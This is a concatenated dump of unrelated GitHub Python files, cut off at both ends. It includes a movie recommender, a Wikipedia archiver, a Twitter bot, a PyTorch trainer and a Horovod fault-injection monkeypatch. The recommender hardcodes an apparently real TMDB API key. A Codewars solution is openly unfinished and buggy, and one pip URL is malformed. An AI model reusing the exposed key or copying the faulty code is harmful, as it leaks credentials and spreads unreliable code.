else:\n ref=\"\"\n\n original_text = original_text.replace(entity[0], f'{str(entity[0])[:1] + \"#+#\" + str(entity[0])[1:]}')\n original_text = original_text.replace('MISC', 'misc')\n original_text = original_text.replace('PER','person')\n original_text = original_text.replace('LOC','place')\n original_text = original_text.replace('ORG','organisation')\n\n \n \"\"\"\n ref_element = f'{entity[0]}'\n ref_element = ref_element.replace('PER', 'Person')\n ref_element = ref_element.replace('LOC', 'Place')\n ref_element = ref_element.replace('ORG', 'Organisation')\n ref_element = ref_element.replace('MISC', 'Bibl')\n\n # replace list of mentioned entities by joined list\n xml_file = xml_file.replace('{ORIGINAL_STRING_MENTION}', '\\n'.join(list_of_mentioned_entities))\n \n \"\"\"\n original_text = original_text.replace('#+#','')\n\n \n # replace {ORIGINAL_TEXT} and {NORMALIZED_TEXT} with value from letters list\n xml_file = xml_file.replace('{ORIGINAL_TEXT}', original_text)\n xml_file = xml_file.replace('{NORMALIZED_TEXT}', normalized_text)\n\n save_letter(xml_file, metadata[\"ID\"])\n except Exception as e:\n print(e)\n try:\n print(letter[0])\n except:\n pass\n \n\ndef process_letters(letters):\n for letter in letters:\n create_letter(letter)\n save_letter(letter)\n \n# textfile containing letters and metadata in {} as well as normalisation of text in [[]]\nxml_template = os.path.join(os.getcwd(), '..', 'data', 'letter_template.xml')\n\nfile_with_letters = os.path.join(os.getcwd(), '..', 'data', 'temp', 'pupikofer_normalized.txt')\n\nsplit_letters = load_letters_from_file(file_with_letters)\ncreate_letter(split_letters, xml_template)","repo_name":"michaelscho/lassberg","sub_path":"src/create_xml_files.py","file_name":"create_xml_files.py","file_ext":"py","file_size_in_byte":15117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13815897809","text":"import streamlit as st\r\nimport pickle\r\nimport pandas as pd\r\nimport requests\r\n\r\ndef fetch_poster(movie_id):\r\n response = requests.get('https://api.themoviedb.org/3/movie/{}?api_key=5454ae2f555c3a6312c7514fc8fabc23&language=en-US'.format(movie_id))\r\n data = response.json()\r\n return \"https://image.tmdb.org/t/p/w500/\" + data['poster_path']\r\n\r\nsimilarity = pickle.load(open('similarity.pkl','rb'))\r\n\r\nmovies_df = pickle.load(open('movies.pkl', 'rb'))\r\nmovies_titles = movies_df['title'].values\r\n\r\n\r\ndef recommend(movie):\r\n movie_index = movies_df[movies_df['title'] == movie].index[0]\r\n distances = similarity[movie_index]\r\n movies_list = sorted(list(enumerate(distances)), reverse=True, key=lambda x: x[1])[1:6]\r\n\r\n recommend_movies = []\r\n recmnd_movie_pstr = []\r\n\r\n for i in movies_list:\r\n movie_id = movies_df.iloc[i[0]].movie_id\r\n\r\n recommend_movies.append(movies_df.iloc[i[0]].title)\r\n\r\n recmnd_movie_pstr.append(fetch_poster(movie_id))\r\n return recommend_movies,recmnd_movie_pstr\r\n\r\n\r\nst.title(\"Movie Recommender System\")\r\n\r\nselected_movie_name = st.selectbox(\r\n 'Enter the movie name',\r\n movies_titles\r\n)\r\n\r\nif st.button('Recommend'):\r\n names,posters = recommend(selected_movie_name)\r\n col1, col2, col3, col4, col5 = st.beta_columns(5)\r\n with col1:\r\n st.text(names[0])\r\n st.image(posters[0])\r\n with col2:\r\n st.text(names[1])\r\n st.image(posters[1])\r\n with col3:\r\n st.text(names[2])\r\n st.image(posters[2])\r\n with col4:\r\n st.text(names[3])\r\n st.image(posters[3])\r\n with col5:\r\n st.text(names[4])\r\n st.image(posters[4])","repo_name":"Aryan-janghu/movie-recommendation","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71405878887","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# This script needs to run imidiatly after viewing wikipedia since WP caches files!\n# It is recommended to run in withing a few minutes after watching the WP article \n# If you run this script after 1 day after viewing article, some articles will not be available\n# S.Chekanov\n\nfrom bs4 import *\nimport argparse\nimport requests\nimport re,os\nimport gzip \nimport shutil # to save it locally\nimport zlib,zipfile\nimport sys, json, urllib.parse\nfrom time import time \nimport tempfile\n\ndirpath = tempfile.mkdtemp()\n\nstime=str(int(time()))\nprint(\"Time=\",stime)\nprint(\"TMP dir=\",dirpath)\n\n#### input parameters ####\nkwargs = {}\nparser = argparse.ArgumentParser()\nparser.add_argument('-q', '--quiet', action='store_true', help=\"don't show verbose\")\nparser.add_argument('-o', '--output', help=\"Save output to\")\nparser.add_argument(\"-i\", '--input', help=\"Input HTML cached file\")\nparser.add_argument(\"-s\", '--source', help=\"Source of encyclopedia\")\nparser.add_argument(\"-t\", '--title', help=\"Title of the article\")\n\nargs = parser.parse_args()\nargs.verbose = not args.quiet\nprint(\"Input=\",args.input)\nprint(\"Output=\",args.output)\nprint(\"Article title =\",args.title)\nprint(\"Encyclopedia source=\",args.source)\nprint(\"Is verbose=\",args.verbose)\n\n# this is where data go\nimg_dir=\"data/media/images\"\ncss_dir=\"data/css\"\nfolder_images=dirpath+\"/\"+img_dir\nfolder_css=dirpath+\"/\"+css_dir\n\n# CREATE FOLDER\ndef folder_create(images):\n\n os.system(\"rm -rf \"+folder_images);\n os.system(\"rm -rf \"+folder_css);\n\n try:\n # folder creation\n os.system(\"mkdir -p \"+folder_images)\n os.system(\"mkdir -p \"+folder_css)\n \n # if folder exists with that name, ask another name\n except:\n print(\"Folder Exist with that name!\")\n pass\n\n # image downloading start\n download_images(images, folder_images)\n \n \n# map to keep replacements for images \nimageReplacer={}\ncssReplacer={}\n\n\ndef zipdir(path, ziph):\n # ziph is zipfile handle\n for root, dirs, files in os.walk(path):\n for file in files:\n ziph.write(os.path.join(root, file),\n os.path.relpath(os.path.join(root, file),\n os.path.join(path, '..')))\n\n# DOWNLOAD ALL IMAGES FROM THAT URL\ndef download_images(images, folder_name):\n \n # intitial count is zero\n count = 0\n \n # print total images found in URL\n print(f\"Total {len(images)} Image Found!\")\n\n if len(images) == 0: return;\n\n allImages=[]\n for i in range(len(images)):\n if (images[i].get('src') !=None): allImages.append(images[i].get('src'))\n if (images[i].get('srcset') !=None): \n ss= images[i].get('srcset').split();\n for i in range(len(ss)):\n allImages.append(ss[i])\n \n if (images[i].get('data-srcset') !=None): \n ss= images[i].get('data-srcset').split();\n for i in range(len(ss)): \n allImages.append(ss[i])\n if (images[i].get('data-src') !=None): allImages.append(images[i].get('data-src'))\n\n for i in range(len(allImages)):\n image_link=allImages[i]\n if (image_link.find(\"//\")==-1): continue\n\n if (args.verbose): print(i,\" \",allImages[i])\n # 1.data-srcset\n # 2.data-src\n # 3.data-fallback-src\n # 4.src\n # 5.srcset \n\n #newname=os.path.basename(image_link)\n newname = image_link.split(\"/\")[-1]\n filename=folder_name+\"/\"+newname\n if (args.verbose): print(count+1, \") downloading=\",image_link,\" to \"+filename)\n\n # correct link when starts with //\n xurl=image_link\n if (xurl.startswith(\"//\")): xurl=\"https:\"+image_link\n r = requests.get(xurl, stream = True)\n\n\n # check svg used in for formulars. Wikipedia does not have file extention! \n # formulars are made in SVG. The browser should know this by extension. \n\n xnames=img_dir+\"/\"+newname\n if (newname.find(\".\")==-1):\n if (image_link.find(\"/svg/\")>-1): \n filename=folder_name+\"/\"+newname+\".svg\";\n xnames=img_dir+\"/\"+newname+\".svg\"; \n\n # remeber replacements\n imageReplacer[image_link]=xnames\n\n # Check if the image was retrieved successfully\n if r.status_code == 200:\n # Set decode_content value to True, file's size will be zero.\n r.raw.decode_content = True\n \n with open(filename,'wb') as f:\n shutil.copyfileobj(r.raw, f)\n\n count = count+1\n if (args.verbose): print('Image sucessfully Downloaded: ',filename)\n else:\n print(image_link,' couldn\\'t be retreived')\n pass\n print(\"Downloaded=\",count,\" images\") \n return count\n\n\n# extract CSS\ndef extractCSS(soup):\n count=0\n for link in soup('link'):\n if link.get('href'):\n if link.get('type') == 'text/css' or link['href'].lower().endswith('.css') or 'stylesheet' in (link.get('rel') or []): \n new_type = 'text/css' if not link.get('type') else link['type']\n css = soup.new_tag('style', type=new_type)\n css['data-href'] = link['href']\n for attr in link.attrs:\n if attr in ['href']:\n continue\n css[attr] = link[attr]\n r_url=link['href']\n if (args.verbose): print(css[attr],r_url) \n r = requests.get(r_url, allow_redirects=True)\n newname = r_url.split(\"/\")[-1]\n filename=folder_css+\"/\"+newname\n cssReplacer[ r_url ] = css_dir+\"/\"+newname \n count=count+1 \n with open(filename,'w') as f:\n f.write(r.text)\n \n print(\"Downloaded=\",count,\" css files\") \n return count \n\n\n# MAIN FUNCTION START\ndef main(html):\n \n # content of URL\n #r = requests.get(url)\n \n # Parse HTML Code\n soup = BeautifulSoup(html, 'html.parser')\n\n # nicely looking\n # html = soup.prettify() #prettify the html\n\n # find all images in URL\n images = soup.findAll('img')\n \n # Call folder create function\n folder_create(images)\n\n # extract CSS\n extractCSS(soup)\n\n xmedia=[]\n htmlnew=html\n print(\"-> Make CSS replacements\")\n for key in cssReplacer:\n xmedia.append(cssReplacer[key])\n if (args.verbose): print(key,\" replaced by \",cssReplacer[key])\n htmlnew=htmlnew.replace(key,cssReplacer[key])\n\n print(\"-> Make image replacements\")\n n=0\n for key in imageReplacer:\n xmedia.append(imageReplacer[key])\n if (args.verbose): print(n, \")\", key,\" replaced by \",imageReplacer[key])\n htmlnew=htmlnew.replace(key,imageReplacer[key])\n n=n+1\n\n output=args.output\n z = zipfile.ZipFile(output, 'w', compression=zipfile.ZIP_DEFLATED) # this is a zip archive\n z.writestr(\"article.html\", htmlnew)\n #for key in imageReplacer:\n # z.write(imageReplacer[key].encode(), imageReplacer[key].encode(), zipfile.ZIP_DEFLATED )\n zipdir(dirpath+'/data/', z)\n #htmltit=os.path.basename(args.input)\n #htmltit=htmltit.replace(\".html.gz\",\"\")\n #htmltit=htmltit.replace(\".html\",\"\")\n metadata = {\"ZWIversion\":\"1\",\"Title\":args.title, \"CreatorName\":args.title,\"Primary\":\"article.html\",\"LastModified\":stime}\n z.writestr(\"metadata.json\", json.dumps(metadata))\n z.writestr(\"media.json\", json.dumps(xmedia))\n z.close()\n\n print(\"Cleared =\",dirpath) \n cmd=\"rm -rf \"+dirpath\n os.system(cmd) \n print(\"Created =\",args.output)\n \n\n# get HTML\nHTML=\"\";\nindex=args.input\n\ntry:\n\n if index.endswith('.html'):\n ret = open(index, 'r', encoding='utf-8').read()\n elif index.endswith('.html.gz'):\n ret = gzip.open(index, 'rt',encoding='utf-8').read()\n\n # prepare file header and footer\n data_head=open('html_header.html', 'r', encoding='utf-8').read();\n data_footer=open('html_footer.html', 'r', encoding='utf-8').read();\n HTML=data_head+ret+data_footer;\n HTML=urllib.parse.unquote(HTML) # replace %28 %29 with ()\nexcept IOError as err:\n print(\"Error\")\n\n# CALL MAIN FUNCTION\nmain(HTML)\n","repo_name":"chekanov/ZWIBuilder","sub_path":"process_zwi.py","file_name":"process_zwi.py","file_ext":"py","file_size_in_byte":8780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14669206119","text":"#Solution in response to https://www.codewars.com/kata/57cebe1dc6fdc20c57000ac9\r\n#CodeWars Shortest Word, Level 7kyu Difficulty\r\n#Instructions:\r\n#Simple, given a string of words, return the length of the shortest word(s).\r\n#String will never be empty and you do not need to account for different data types.\r\n\r\n#WORK IN PROGRESS\r\n\r\n#for every string in the list, if length of next string is less than the length of initial string, set the intial length eaqul to new one\r\n\r\ndef find_short(s):\r\n length = len(s)\r\n short = len(s[0])\r\n index = 0\r\n for x in range(1, length):\r\n if len(s[x]) < short:\r\n short = s[x]\r\n index = x\r\n return index \r\n# returns the index of the shortest word in the list\r\n","repo_name":"aleks-hat/Python-Basics","sub_path":"CW_ShortestWord.py","file_name":"CW_ShortestWord.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2327545406","text":"#from credentials import *\nfrom os import environ\nimport datetime\nfrom time import sleep\nimport tweepy\nimport rnn_naruto\nimport sys\n\n\nINTERVAL = 60 * 60 * 6 # tweet every 6 hours\n\n# auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n# auth.set_access_token(access_token, access_token_secret)\nauth = tweepy.OAuthHandler(environ['CONSUMER_KEY'],\n environ['CONSUMER_SECRET'])\nauth.set_access_token(environ['ACCESS_TOKEN'],\n environ['ACCESS_TOKEN_SECRET'])\napi = tweepy.API(auth)\n\nmodel = rnn_naruto.fit_model() # rnn\n\n\ndef generate_name_for_tweet():\n names = rnn_naruto.get_names(model)\n return names\n\n\ndef tweets():\n names = generate_name_for_tweet()\n for i in range(4):\n try:\n print('new tweet')\n api.update_status('Generated name of the RNN: '+names[i])\n sleep(30)\n except tweepy.TweepError as e:\n print(e.reason)\n except StopIteration:\n break\n\n\ndef search_tweet_print():\n for tweet in tweepy.Cursor(api.search, q='#naruto').items(10):\n print('Tweet by: @' + tweet.user.screen_name)\n\n\ndef search_tweet_retweet():\n for tweet in tweepy.Cursor(api.search, q='#naruto').items(4):\n try:\n print('new retweet')\n tweet.retweet()\n sleep(30)\n except tweepy.TweepError as e:\n print(e.reason)\n except StopIteration:\n break\n\n\ndef bot_run():\n print('bot running')\n while True:\n tweets()\n # search_tweet_retweet()\n sleep(INTERVAL)\n\n\nbot_run()\n","repo_name":"andraderaul/naruto-name-generator","sub_path":"twitter_bot.py","file_name":"twitter_bot.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"9818700385","text":"def obtener_data():\r\n \r\n lis = []\r\n \r\n f = open(file=\"platos.txt\", encoding=\"utf8\", mode=\"r\",newline=\"\\n\")\r\n \r\n for linea in f:\r\n linea = linea.strip(\"\\r\\n\")\r\n lista = linea.split(\",\")\r\n lis.append(lista)\r\n return lis\r\n\r\ndef obtener_stock():\r\n \r\n stock = []\r\n \r\n f = open(file=\"stock.txt\", encoding=\"utf8\", mode=\"r\",newline=\"\\n\")\r\n \r\n for linea in f:\r\n linea = linea.strip(\"\\r\\n\")\r\n lista = linea.split(\",\")\r\n stock.append(lista)\r\n\r\n return stock\r\n \r\ndef mod_sotck(stock):\r\n ing = []\r\n for item in stock:\r\n print(f\"{item[0]} - {item[1]}\")\r\n ing.append(item[0])\r\n \r\n user = input(\"Ingrese que stock desea modificar: \")\r\n while user not in ing:\r\n user = input(\"Ingrese un stock existente: \")\r\n \r\n cant = input(\"Ingrese la nueva cantidad: \")\r\n \r\n\r\n \r\n with open(file=\"stock.txt\", encoding=\"utf8\", mode=\"w\",newline=\"\\n\") as f:\r\n for item in stock:\r\n if item[0] == user:\r\n item[1] = cant\r\n f.write(f\"{item[0]},{item[1]}\\n\")\r\n \r\ndef nuevo_plato(data):\r\n pass\r\n\r\ndef listar_negativos(data):\r\n pass\r\n\r\ndef menu():\r\n print(\"\"\"\r\n 1- Modificar Stock\r\n 2- Agregar nuevo plato\r\n 3- Listado de stocks negativos\r\n 4- Salir\r\n \"\"\")\r\n \r\ndef main():\r\n \r\n data = obtener_data()\r\n stock = obtener_stock()\r\n menu()\r\n user = int(input(\"Ingrese una opcion: \"))\r\n while user != 4:\r\n if user == 1:\r\n mod_sotck(stock)\r\n menu()\r\n user = int(input(\"Ingrese una opcion: \"))\r\n elif user == 2:\r\n nuevo_plato(data)\r\n menu()\r\n user = int(input(\"Ingrese una opcion: \"))\r\n elif user == 3:\r\n listar_negativos(stock)\r\n menu()\r\n user = int(input(\"Ingrese una opcion: \"))\r\n\r\nmain()","repo_name":"GonzaloOesterheld/Algoritmos_y_Programacion_I","sub_path":"anterior.py","file_name":"anterior.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73765836329","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 30 17:25:17 2020\r\n\r\n@author: MOHANA D\r\n\"\"\"\r\n\r\n#\tPlease write a program which prints all permutations of [1,2,3]\r\nfrom itertools import permutations\r\n\r\npermtn= permutations([1,2,3])\r\n\r\nfor i in permtn:\r\n print(i)","repo_name":"dasari-mohana-zz/Python_Assignments","sub_path":"permutation.py","file_name":"permutation.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71603180649","text":"# 100/100\r\n\r\nn = int(input())\r\nmatriz, colunas = [[0]*n]*n, [0]*n\r\nlinha, indiceL, coluna, indiceC = 0, 0, 0, 0\r\n\r\nfor k in range(n):\r\n matriz[k] = list(map(int, input().split()))\r\n\r\n # coleta a maior soma e o indice da linha\r\n if sum(matriz[k]) > linha:\r\n linha, indiceL = sum(matriz[k]), k\r\n\r\n for j in range(n):\r\n colunas[j] += matriz[k][j]\r\n\r\n # coleta a maior soma e o indice da coluna\r\n if colunas[j] > coluna:\r\n coluna, indiceC = colunas[j], j\r\n\r\nprint((coluna+linha) - (2 * matriz[indiceL][indiceC]))","repo_name":"kaiquesouzasantos/estudos-python","sub_path":"NepsAcademy/torre.py","file_name":"torre.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30484025464","text":"\n\nimport json\nimport os\nimport shutil\nimport sys\nfrom typing import Union\nfrom .gui import Chromium\nfrom .converter import Flask\n\nclass AltJSON:\n def __init__(self, **kwds):\n for k in kwds.keys():\n self.__setattr__(k, kwds[k])\n\n def as_json(self):\n return vars(self)\n\ndef create_debug_app(config: Union[dict, AltJSON]):\n if isinstance(config, AltJSON):\n config = config.as_json()\n f = Flask(config)\n f.run_server()\n c = Chromium(f)\n c.run()\n\ndef freeze(input_file, output, config:dict):\n print(\"Freezing your app...\")\n print(\"Creating App Container...\")\n f = Flask(config)\n shutil.copytree(os.path.dirname(os.path.abspath(__name__+\".py\")), output)\n print(\"Collecting Positron Distutils...\")\n if sys.platform != \"win32\":\n os.system(\"python3 -m pip install git+https://cordtech32/positron --target=floss_modules\")\n else:\n os.system(\"pip install git+https://github.com/cordtech32/positron --target=posi_modules\")\n print(\"Reading Metadata...\")\n with open(\"package.json\") as js:\n pack = json.load(js)\n\n with open(input_file) as f:\n app = f.read()\n \n print(\"Creating Project...\")\n \n with open(output+f\"/{pack['entrypoint']}.py\",\"w\") as f:\n f.write(app)\n\n if sys.platform != \"win32\":\n with open(output+\"/positron.sh\", \"w\") as f:\n f.write(f\"\"\"\n #!/bin/bash\n python3 positron.py\n \"\"\")\n\n with open(output+\"/positron.py\",\"w\") as f:\n f.write(f\"\"\"\nfrom {pack['entrypoint']} import app\nfrom posi_modules.positron import create_debug_app, AltJSON\n\nstruct = AltJSON(flask_app=app, flask_address=\"{pack['flask_host']}\", name=\"{pack['name']}\")\n\ncreate_debug_app(struct)\n \"\"\")\n else:\n with open(output+\"/positron.cmd\", \"w\") as f:\n f.write(f\"\"\"\n py positron.py\n \"\"\")\n\n\n with open(output+\"/positron.py\",\"w\") as f:\n f.write(f\"\"\"\nfrom {pack['entrypoint']} import app\nfrom posi_modules.positron import create_debug_app, AltJSON\n\nstruct = AltJSON(flask_app=app, flask_address=\"{pack['flask_host']}\", name=\"{pack['name']}\")\n\ncreate_debug_app(struct)\n \"\"\")\n\n print(\"Positron Distributable is now created!\")\n print(\"Happy Hacking :)\")\n\n ","repo_name":"CordTech32/Positron","sub_path":"positron/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29748975007","text":"# -*- coding: utf-8 -*-\r\n# Copyright © 2019 tao.hu \r\n\r\nfrom __future__ import print_function, absolute_import\r\n\r\nimport time\r\nimport torch\r\nfrom torch.autograd import Variable\r\nfrom template.utils.meters import AverageMeter\r\n\r\n\r\nclass BaseTrainer(object):\r\n def __init__(self, cfg, model):\r\n super(BaseTrainer, self).__init__()\r\n self.cfg = cfg\r\n self.model = model\r\n\r\n def train(self, epoch, data_loader, optimizer, print_freq=10):\r\n self.model.train()\r\n\r\n batch_time = AverageMeter()\r\n data_time = AverageMeter()\r\n losses = AverageMeter()\r\n\r\n end = time.time()\r\n for i, inputs in enumerate(data_loader):\r\n data_time.update(time.time() - end)\r\n\r\n inputs = self._parse_data(inputs)\r\n loss = self._forward(inputs)\r\n losses.update(loss.item())\r\n\r\n optimizer.zero_grad()\r\n loss.backward()\r\n if self.cfg.TRAIN.GRAD.Grad_clip:\r\n torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.cfg.TRAIN.GRAD.Max_grad)\r\n optimizer.step()\r\n\r\n batch_time.update(time.time() - end)\r\n end = time.time()\r\n\r\n if (i + 1) % print_freq == 0:\r\n print('Epoch: [{}][{}/{}]\\t'\r\n 'Time {:.3f} ({:.3f})\\t'\r\n 'Data {:.3f} ({:.3f})\\t'\r\n 'Loss {:.3f} ({:.3f})\\t'\r\n .format(epoch, i + 1, len(data_loader),\r\n batch_time.val, batch_time.avg,\r\n data_time.val, data_time.avg,\r\n losses.val, losses.avg))\r\n\r\n def _parse_data(self, inputs):\r\n raise NotImplementedError\r\n\r\n def _forward(self, inputs):\r\n raise NotImplementedError\r\n\r\n\r\nclass ScoreTrainer(BaseTrainer):\r\n def _parse_data(self, inputs):\r\n inputs['exp_data'] = Variable(inputs['patch_seqs']).cuda(non_blocking=True)\r\n return inputs\r\n\r\n def _forward(self, inputs):\r\n loss = self.model(inputs)\r\n loss = torch.sum(loss) / (loss.size(0))\r\n return loss\r\n\r\n","repo_name":"ecart18/pytorch-template","sub_path":"template/trainer/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"236113382","text":"import Prog_LinkedListUtil as util\n\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def push(self, value):\n newNode = Node(value)\n newNode.next = self.head\n self.head = newNode\n\n def printList(self):\n curr = self.head\n\n while curr:\n print(curr.value, end=\" \")\n curr = curr.next\n print()\n\n def reverseList(self):\n curr = self.head\n prev = None\n\n while curr:\n future = curr.next\n curr.next = prev\n prev = curr\n curr = future\n self.head = prev\n\n def reverse(self, head):\n curr = head\n prev = None\n\n while curr:\n future = curr.next\n curr.next = prev\n prev = curr\n curr = future\n # head = prev\n # return head\n return prev\n\n\n'''\ndef getNodes():\n \"\"\"Build custom value linked list node\"\"\"\n nodes = []\n n = int(input(\"Please enter the size of linked list \\n\"))\n nodes[:n] = []\n # nodes[:n:-1] = []\n i = 1\n\n while i <= n:\n print(f\"Please enter {i} node value: \")\n x = int(input())\n nodes.append(x)\n # nodes[-1*i] = x\n i = i + 1\n # Reverse list or use nodes.insert(0, x) to insert at first position which shifts the nodes towards its right\n reversenodes = nodes[::-1]\n \"\"\" print(nodes)\n print(reversenodes) \"\"\"\n return reversenodes\n'''\n\nif __name__ == '__main__':\n \"\"\"Main method\"\"\"\n # nodes = getNodes()\n nodes = util.getNodes()\n\n ll = LinkedList()\n\n for node in nodes:\n ll.push(node)\n\n ll.printList()\n # ll.reverseList()\n ll.head = ll.reverse(ll.head)\n ll.printList()\n","repo_name":"solouniverse/Python","sub_path":"DS/LinkedList/Prog_ReverseList.py","file_name":"Prog_ReverseList.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14054689111","text":"from models import db, Product\nimport setup\n\napp = setup.create_app()\n\nitems = [\n {\n 'name': 'Product 1',\n 'slug': 'product-1',\n 'image': 'apple.png',\n 'price': 1\n },\n {\n 'name': 'Product 2',\n 'slug': 'product-2',\n 'image': 'banana.png',\n 'price': 2\n },\n {\n 'name': 'Product 3',\n 'slug': 'product-3',\n 'image': 'coffee.png',\n 'price': 3\n },\n {\n 'name': 'Product 4',\n 'slug': 'product-4',\n 'image': 'rubber_duck.png',\n 'price': 4\n },\n {\n 'name': 'Product 5',\n 'slug': 'product-5',\n 'image': 'tomato.png',\n 'price': 1\n },\n {\n 'name': 'Product 6',\n 'slug': 'product-6',\n 'image': 'Fidget_spinner_in_blue.png',\n 'price': 3\n },\n]\n\nfor item in items:\n\n record = Product.query.filter_by(slug=item['slug']).first()\n\n if record is None:\n\n print(\"Adding product \" + item['slug'] + \"\\n\")\n\n record = Product()\n record.name = item['name']\n record.slug = item['slug']\n record.image = item['image']\n record.price = item['price']\n\n db.session.add(record)\n db.session.commit()\n else:\n print(\"product \" + item['slug'] + \" has already been added ...... Skipping \\n\")\n\n\n\n\n","repo_name":"gianpaoloriva/devops_course","sub_path":"02_Microservices/Microservices-flask-mysql/product_service.git/app/add_products.py","file_name":"add_products.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41080355150","text":"def run():\n # for contador in range(1000):\n # if contador % 2 != 0: #Si a contador lo divido en 2 y su resto es diferente de cero\n # continue #se salta y no ejecuta lo que esta debajo de continue y se pasa a la siguiente vuelta en el ciclo.\n # print(contador)\n \n # for i in range(2000):\n # print(i)\n # if i == 678: #Si i toma ese valor, se termina la ejecución del ciclo\n # break\n\n#Ejemplo recorriendo un string\n texto = input(\"Escribe una frase: \")\n for letra in texto:\n #print(letra) SI lo dejo asi, imprime la primera O que encuentra\n if letra == \"o\": #Si en el texto se encuentra una \"o\", se termina la ejecución del ciclo\n break\n print(letra) # SI dejo el print aqui imprime hasta la letra antes de la \"o\"\n\nif __name__ == \"__main__\":\n run()","repo_name":"MCataS/BasicPython","sub_path":"break_continue.py","file_name":"break_continue.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10440547744","text":"from monkeypatch import monkeypatch\nimport whatreallyhappened as wrh\n\n\nimport horovod.tensorflow as hvd\nimport tensorflow as tf\nfrom horovod.tensorflow.gradient_aggregation import LocalGradientAggregationHelper\nfrom horovod.tensorflow.gradient_aggregation_eager import LocalGradientAggregationHelperEager\nfrom horovod.tensorflow.mpi_ops import rank\n\nfrom horovod._keras import _PRE_TF_2_4_0\n\n\n_rank = None\n_divisor = 1\n_act_after_layer = None\n_act_after_gradient = None\n_action = None\n\n\ndef set_params(**kwargs):\n if kwargs['rank'] is not None:\n global _rank\n _rank = kwargs['rank']\n\n if kwargs['divisor'] is not None:\n global _divisor\n _divisor = kwargs['divisor']\n\n if kwargs['act_after_layer'] is not None:\n global _act_after_layer\n _act_after_layer = kwargs['act_after_layer']\n\n if kwargs['act_after_gradient'] is not None:\n global _act_after_gradient\n _act_after_gradient = kwargs['act_after_gradient']\n\n if kwargs['action'] is not None:\n global _action\n _action = kwargs['action']\n\n\n@monkeypatch('horovod._keras.create_distributed_optimizer')\ndef create_distributed_optimizer(keras, optimizer, name, device_dense, device_sparse,\n compression, sparse_as_dense, gradient_predivide_factor,\n op, backward_passes_per_step=1,\n average_aggregated_gradients=False,\n groups=None, *, create_distributed_optimizer):\n # Force the Sum operation because we'll prescale manually for the average\n op = hvd.Sum\n\n class _DistributedOptimizer(keras.optimizers.Optimizer):\n _HAS_AGGREGATE_GRAD = True\n\n def __init__(self, **kwargs):\n self._name = name or \"Distributed%s\" % self.__class__.__base__.__name__\n self._aggregated_gradients = False\n\n self._allreduce_grads = hvd._make_allreduce_grads_fn(\n self._name,\n device_dense,\n device_sparse,\n compression,\n sparse_as_dense,\n op,\n gradient_predivide_factor,\n groups)\n\n self._agg_helper = None\n if backward_passes_per_step > 1:\n if hvd._executing_eagerly():\n self._agg_helper = LocalGradientAggregationHelperEager(\n backward_passes_per_step=backward_passes_per_step,\n allreduce_func=self._allreduce_grads,\n sparse_as_dense=sparse_as_dense,\n average_aggregated_gradients=average_aggregated_gradients,\n )\n else:\n self._agg_helper = LocalGradientAggregationHelper(\n backward_passes_per_step=backward_passes_per_step,\n allreduce_func=self._allreduce_grads,\n sparse_as_dense=sparse_as_dense,\n average_aggregated_gradients=average_aggregated_gradients,\n rank=rank(),\n optimizer_type=LocalGradientAggregationHelper._OPTIMIZER_TYPE_KERAS,\n )\n\n super(self.__class__, self).__init__(**kwargs)\n\n def _compute_gradients(self, loss, var_list, grad_loss=None, tape=None):\n \"\"\"\n Compute gradients of all trainable variables.\n See Optimizer.get_gradients() for more info.\n In DistributedOptimizer, get_gradients() is overriden to also\n allreduce the gradients before returning them.\n \"\"\"\n if _PRE_TF_2_4_0:\n ret = super(self.__class__, self)._compute_gradients(\n loss, var_list, grad_loss, tape)\n return ret\n\n tape = backprop.GradientTape() if tape is None else tape\n grads_and_vars = super(self.__class__, self)._compute_gradients(\n # pylint: disable=protected-access\n loss,\n var_list,\n grad_loss,\n tape=tape)\n grads, weights = list(zip(*grads_and_vars))\n\n gradient_counter = 0\n def make_wrapper(tensor):\n layer_counter = 0\n def wrapper(inp):\n nonlocal gradient_counter, layer_counter\n\n do_action = False\n\n if _act_after_layer is not None:\n layer_counter += 1\n if _act_after_layer == layer_counter:\n if _act_after_gradient is None:\n do_action = True\n \n if _act_after_gradient is not None:\n gradient_counter += 1\n\n if gradient_counter >= _act_after_layer:\n do_action = True\n\n elif _act_after_gradient is not None:\n gradient_counter += 1\n\n if gradient_counter >= _act_after_gradient:\n do_action = True\n\n #wrh.push('create_distributed_optimizer._DistributedOptimizer._compute_gradients.wrapper')\n\n if do_action and _action == 'stop':\n #wrh.log('stop', '%r', 